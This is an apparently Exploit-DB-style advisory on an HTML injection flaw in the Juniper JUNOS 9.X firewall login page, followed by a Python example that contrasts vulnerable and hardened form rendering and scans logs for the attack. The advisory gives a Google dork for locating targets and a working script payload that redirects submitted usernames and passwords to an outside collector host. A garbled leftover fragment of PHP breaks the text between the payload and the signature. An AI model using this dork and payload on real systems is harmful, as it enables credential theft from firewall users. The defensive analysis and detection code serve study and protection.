Exploit Title: Juniper JUNOS 9.X HTML Injection Vulnerability
Google Dork: intext:"2009, Juniper Networks" intext:"Firewall User Web-Authentication"
Date: Jul 24th 2013
Exploit Author: Andrea Menin (linkedin.com/in/andreamenin)
Vendor Homepage: http://www.juniper.net
Version: JUNOS 9.X
Tested on: Firefox 22.0

Description:
------------
The Juniper firewall has a PHP authentication and authorization page for using ports and services that are usually not enabled. The page contains an HTML form that sends authentication requests to the following URL:

    https://?target=&auth_id=&ap_name=

Looking at this URL we can see that, along with the username and password, the variables $target, $auth_id and $ap_name are sent. The contents of these variables are placed, without encoding, in the destination URL of the HTML form (the "action" attribute), so injecting HTML code into these variables changes the form markup: the "action" attribute can be replaced so that usernames and passwords are submitted to an external page.

Exploit:
--------
The exploit consists of injecting a script that uses DOM functions to replace the "action" attribute of the form tag with an external URL that collects the usernames and passwords entered by users. The DOM function "setAttribute" can be used to replace the "action" attribute, as in this script:

Exploit URL:

    https:///?target=&auth_id=&ap_name=%22%3E%3Cscript%3Edocument.getElementsByTagName%28%27form%27%29[0].setAttribute%28%27action%27,%20%27http://i.am.a.bad.boy.xy/fuck.php%27%29%3C/script%3E%3Ca%20href=%22

URL-decoded, it looks like this:

    https:///?target=&auth_id=&ap_name="><script>document.getElementsByTagName('form')[0].setAttribute('action', 'http://i.am.a.bad.boy.xy/fuck.php')</script><a href="

    "\n" );
    // taking user to home
    header("Location: https://10.0.0.1");
    ?>

have fun.

--
Andrea (aka und3r) Menin
menin.andrea [at] gmail.com
linkedin.com/in/andreamenin
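The root cause above is a missing encoding step between query values and the form's "action" attribute. The following is an added Python example, not code from the advisory or from Juniper: it reproduces the flawed concatenation pattern with a hypothetical page URL (fw.example.test), shows the same rendering with per-context encoding applied, checks with an HTML parser whether the advisory's decoded payload becomes real elements or stays inert attribute text, and runs a small detection over constructed access-log lines. All host names, log lines and function names are assumptions.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, quote

# The advisory's payload, URL-decoded: it closes the action attribute, injects a
# <script> that rewrites the form's action, then re-opens an attribute so the
# remaining original markup still parses.
PAYLOAD = ('"><script>document.getElementsByTagName(\'form\')[0]'
           '.setAttribute(\'action\', \'http://i.am.a.bad.boy.xy/fuck.php\')'
           '</script><a href="')

# Hypothetical page URL standing in for the firewall's web-auth page (assumption).
BASE = "https://fw.example.test/auth"
PARAMS = ("target", "auth_id", "ap_name")


def render_form_vulnerable(target, auth_id, ap_name):
    """Mirrors the flaw: raw query values concatenated into the action URL,
    and the URL concatenated into the attribute, with no encoding at all."""
    action = "%s?target=%s&auth_id=%s&ap_name=%s" % (BASE, target, auth_id, ap_name)
    return '<form method="post" action="%s">...</form>' % action


def render_form_hardened(target, auth_id, ap_name):
    """Encode for each context in turn: percent-encode every query value
    (nothing treated as 'safe'), then HTML-escape the whole attribute value."""
    values = dict(zip(PARAMS, (target, auth_id, ap_name)))
    query = "&".join("%s=%s" % (k, quote(values[k], safe="")) for k in PARAMS)
    return '<form method="post" action="%s">...</form>' % html.escape(BASE + "?" + query, quote=True)


class _TagCollector(HTMLParser):
    """Records element start tags, so we can see whether injected markup
    became real elements or stayed inert text inside the attribute."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def element_tags(rendered):
    collector = _TagCollector()
    collector.feed(rendered)
    collector.close()
    return collector.tags


# Strings that have no business inside a target host, AP name or auth id.
MARKUP_RE = re.compile(r"<\s*/?\s*script|setattribute\s*\(|javascript:", re.I)


def flag_suspicious_requests(log_lines):
    """Scan combined-format access log lines; return (client_ip, parameter)
    pairs whose percent-decoded query value contains script-like markup."""
    hits = []
    for line in log_lines:
        fields = line.split()
        if len(fields) < 7:
            continue
        client_ip, path = fields[0], fields[6]
        query = path.partition("?")[2]
        decoded = parse_qs(query, keep_blank_values=True)  # decodes %XX for us
        for name, values in decoded.items():
            if any(MARKUP_RE.search(v) for v in values):
                hits.append((client_ip, name))
    return hits


# Constructed sample log lines (not real traffic): a benign request and one
# carrying the advisory's encoded payload in ap_name.
SAMPLE_LOG = [
    '10.0.0.23 - - [24/Jul/2013:10:15:02 +0000] '
    '"GET /?target=&auth_id=&ap_name=wifi HTTP/1.1" 200 1432',
    '203.0.113.9 - - [24/Jul/2013:10:16:40 +0000] '
    '"GET /?target=&auth_id=&ap_name=%22%3E%3Cscript%3Edocument.getElementsByTagName'
    '%28%27form%27%29[0].setAttribute%28%27action%27,%20%27http://i.am.a.bad.boy.xy/'
    'fuck.php%27%29%3C/script%3E%3Ca%20href=%22 HTTP/1.1" 200 1610',
]

if __name__ == "__main__":
    print("vulnerable:", element_tags(render_form_vulnerable("", "", PAYLOAD)))
    print("hardened:  ", element_tags(render_form_hardened("", "", PAYLOAD)))
    print("flagged:   ", flag_suspicious_requests(SAMPLE_LOG))
```

With the payload, the vulnerable rendering yields three elements (form, script, a) because the attribute was closed early; the hardened rendering yields only the form, since `<` and `"` never reach the HTML parser unencoded. Encoding fixes the injection, but for parameters like ap_name and target, whose legitimate values come from a known set, validating them against an allow-list before rendering is the stronger control; the log scan is a coarse triage aid, not a substitute for either.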